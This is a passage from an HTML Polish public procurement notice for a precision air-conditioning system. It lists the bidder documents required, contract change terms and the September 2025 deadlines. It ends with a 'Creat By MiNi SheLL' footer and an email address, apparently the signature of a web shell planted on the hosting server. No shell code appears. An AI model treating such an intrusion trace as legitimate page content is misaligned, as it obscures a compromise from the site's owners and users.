należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, w przypadku świadczeń powtarzających się lub ciągłych<br/>są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie<br/>Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty<br/>potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. Wzór oświadczenia stanowi<br/>Załącznik nr 15 do SWZ.<br/>Oświadczenia dot. kwalifikacji zawodowych zgodnego z treścią Załącznika nr 14 do SWZ.<br/>Kopii polisy ubezpieczeniowej od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem<br/>zamówienia na sumę gwarancyjną nie mniejszą niż 1.000.000,00 PLN (słownie: Jeden milion złotych 00/100).<br/>Kopii certyfikatu dla przedsiębiorcy, o którym mowa w art. 29 ust. 2 ustawy z dnia 15 maja 2015 r. o substancjach zubożających<br/>warstwę ozonową oraz o niektórych fluorowanych gazach cieplarnianych (Dz. U. z 2020 r. poz. 2065), uprawniający do wykonywania<br/>działalności w zakresie instalowania, konserwacji lub serwisowania urządzeń zawierających fluorowane gazy cieplarniane.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający działając zgodnie z art. 105 ust. 1-3 ustawy Pzp w celu potwierdzenia zgodności dostaw oferowanego systemu klimatyzacji precyzyjnej i jego elementów oraz ich parametrów z wymaganiami SWZ, dokona oceny na podstawie karty katalogowej /folderu technicznego producenta oferowanego urządzenia.<br/>Wykonawca zgodnie z art. 107 ust. 1 ustawy Pzp jest zobowiązany złożyć przedmiotowe środki dowodowe wraz z ofertą. Zamawiający informuje, że zgodnie z treścią art. 107 ust. 3 ustawy Pzp nie podlegają uzupełnieniu przedmiotowe środki dowodowe niezłożone wraz z ofertą lub złożone niekompletne przedmiotowe środki dowodowe.<br/>Zamawiający działając zgodnie z postanowieniami art. 107 ust. 4 ustawy Pzp, zastrzega możliwość żądania od Wykonawców wyjaśnień dotyczących treści złożonych przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> ofertę na Formularzu Ofertowym zawartym w treści Załącznika nr 1 do SWZ wraz z Formularzem cenowym wg treści<br/>Załącznika nr 2 do SWZ.<br/>Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy/ Wykonawców<br/>występujących wspólnie w postępowaniu o udzielenie zamówienia publicznego złożone w postaci elektronicznej, opatrzone<br/>kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osobę/-y upoważnioną/-e<br/>której/-ych umocowanie do reprezentowania, co wynika z dokumentów rejestrowych – w przypadku, gdy oferta nie została<br/>podpisana przez osoby upoważnione do tych czynności dokumentem rejestrowym. Poświadczenia zgodności elektronicznej<br/>kopii pełnomocnictwa z dokumentem w postaci papierowej może dokonać mocodawca lub notariusz.<br/>(Uwaga: w przypadku spółki cywilnej dokumentami zastępującymi pełnomocnictwo mogą być umowa spółki lub uchwała<br/>wspólników, wskazująca jednego ze wspólników jako umocowanego do reprezentacji spółki (wszystkich wspólników)).<br/>Odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub<br/>innego właściwego rejestru, w celu potwierdzenia, że osoba w imieniu Wykonawcy jest umocowana do jego<br/>reprezentowania.<br/>Zobowiązanie podmiotów udostępniających Wykonawcy do dyspozycji niezbędne zasoby na potrzeby realizacji zamówienia<br/>lub inny podmiotowy środek dowodowy na potwierdzenie, że Wykonawca realizując niniejsze zamówienie będzie<br/>dysponował niezbędnymi zasobami, w przypadku gdy Wykonawca będzie polegać na zasobach innych podmiotów (wzór<br/>oświadczenia zawarty jest w treści Załącznika nr 10 do SWZ).<br/>Oświadczenia (aktualne na dzień składania ofert):<br/>-potwierdzające brak podstaw wykluczenia, zgodnie z treścią Załącznika nr 5 do SWZ,<br/>-potwierdzające spełnianie warunków udziału w postępowaniu, zgodnie z treścią Załącznika nr 4 do SWZ,<br/>- Wykonawców wspólnie ubiegających się o udzielenie zamówienia w zakresie wskazania części przedmiotowego<br/>zamówienia, które wykonają poszczególni Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (członkowie<br/>konsorcjum). Wzór oświadczenia stanowi Załącznik nr 6 do SWZ, o którym mowa w Rozdziale III.2 pkt. 1.2.4.1 ppkt 4)<br/>„Uwagi”.<br/>Oświadczenia, o których mowa w punktach 2.4.1 - 2.4.2 stanowią dowody potwierdzające brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w postępowaniu na dzień składania ofert, tymczasowo zastępujące wymagane przez<br/>Zamawiającego podmiotowe środki dowodowe.<br/>Oświadczenia potwierdzające zapoznanie Wykonawcy/ Podwykonawcy z klauzulą informacyjną w zakresie przetwarzania danych osobowych zgodne z treścią Załącznika nr 11 do SWZ.<br/>Oświadczenie w zakresie wypełnienia obowiązków informacyjnych przewidzianych w art. 13 lub 14 RODO zgodne z treścią<br/>Załącznika nr 12 do SWZ.<br/>Kartę katalogową /folder techniczny producenta oferowanego urządzenia, zawierający dane techniczne pozwalające na<br/>ocenę zgodności oferowanego produktu z wymaganiami określonymi w SWZ.<br/>Dokumenty składane przez Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej<br/>Polskiej - zgodnie z informacjami zawartymi w treści Rozdziału IV.3 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi być podpisana w taki sposób, by prawnie<br/>zobowiązywała wszystkich Wykonawców występujących wspólnie. Każdy z Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia musi udokumentować, że nie podlega wykluczeniu z postępowania na podstawie przesłanek<br/>określonych w Rozdz. III.1 SWZ. Zgodnie z art. 58 ust. 2 ustawy Pzp muszą ustanowić pełnomocnika do reprezentowania<br/>ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem. Przed<br/>podpisaniem umowy przedłożą pełnomocnictwo do zawarcia umowy w sprawie zamówienia publicznego, jeżeli<br/>pełnomocnictwo takie nie zostało dołączone do oferty. W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub<br/>doświadczenia, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z<br/>Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>Ustanowiony w Rozdziale III.2 pkt 1.2.2 warunek udziału w postępowaniu dotyczący uprawnień do prowadzenia określonej<br/>działalności gospodarczej lub zawodowej zgodnie z art. 112 ust. 2 pkt 2) ustawy Pzp będzie spełniony, jeżeli co najmniej<br/>jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej<br/>działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Strony przewidują możliwość dokonania zmian niniejszej umowy zgodnie z postanowieniami art. 455 ustawy Pzp m.in.<br/>spowodowanych:<br/>1) okolicznościami, których Zamawiający działając z należytą starannością nie mógł przewidzieć, o ile zmiana nie modyfikuje<br/>ogólnego charakteru umowy a wzrost ceny spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierwotnej<br/>umowy,<br/>2) zmianą powszechnie obowiązujących przepisów prawa lub wynikających z prawomocnych orzeczeń lub ostatecznych<br/>aktów administracyjnych właściwych organów - w takim zakresie, w jakim będzie to niezbędne w celu dostosowania<br/>postanowień umowy do zaistniałego stanu prawnego lub faktycznego (z wyłączeniem warunków w umowie dotyczących<br/>wynagrodzenia Wykonawcy z wyjątkiem zmiany obowiązującej stawki podatku VAT),<br/>3) zmianą stanu prawnego lub faktycznego Zamawiającego powodującą, że wykonanie przedmiotu umowy lub jego części<br/>w obecnym zakresie staje się bezprzedmiotowe lub wręcz niemożliwe do realizacji,<br/>4) zmianą w zakresie sposobu wykonywania zadań lub zasad funkcjonowania (organizacyjnych) Zamawiającego<br/>powodującą, że wykonanie przedmiotu umowy lub jego części, w obecnym zakresie staje się bezprzedmiotowe lub wręcz<br/>niemożliwe do realizacji,<br/>5) zmianą wytycznych lub zaleceń instytucji, która przyznała środki na finansowanie zamówienia,<br/>6) wystąpieniem Siły wyższej w rozumieniu definicji określonej w treści § 1 ust. 1 umowy,<br/>7) wymogiem ochrony interesu Zamawiającego<br/>Działając zgodnie z postanowieniami art. 455 ust. 2 ustawy Pzp Zamawiający jest uprawniony do dokonywania<br/>jednostronnych zmian umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia, których łączna wartość<br/>jest niższa niż 10% łącznej wartości pierwotnej umowy określonej w treści § 6 ust. 1 umowy a zmiany te nie powodują zmiany ogólnego charakteru niniejszej umowy.<br/>Szczegółowe warunki zmian zostały opisane przez Zamawiającego w projektowanych postanowieniach umowy wraz z załącznikami, stanowiących Załącznik nr 8 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-09-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/arimr</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-09-15 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-10-13</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Uwagi do pkt 4.2.10.) <br/>Zamawiający wymaga realizacji zamówienia w następującym terminie nie dłuższym niż 50 dni roboczych liczonych od dnia zawarcia umowy z uwzględnieniem warunków określonych w Rozdziale I.2.1.13.

Creat By MiNi SheLL
Email: jattceo@gmail.com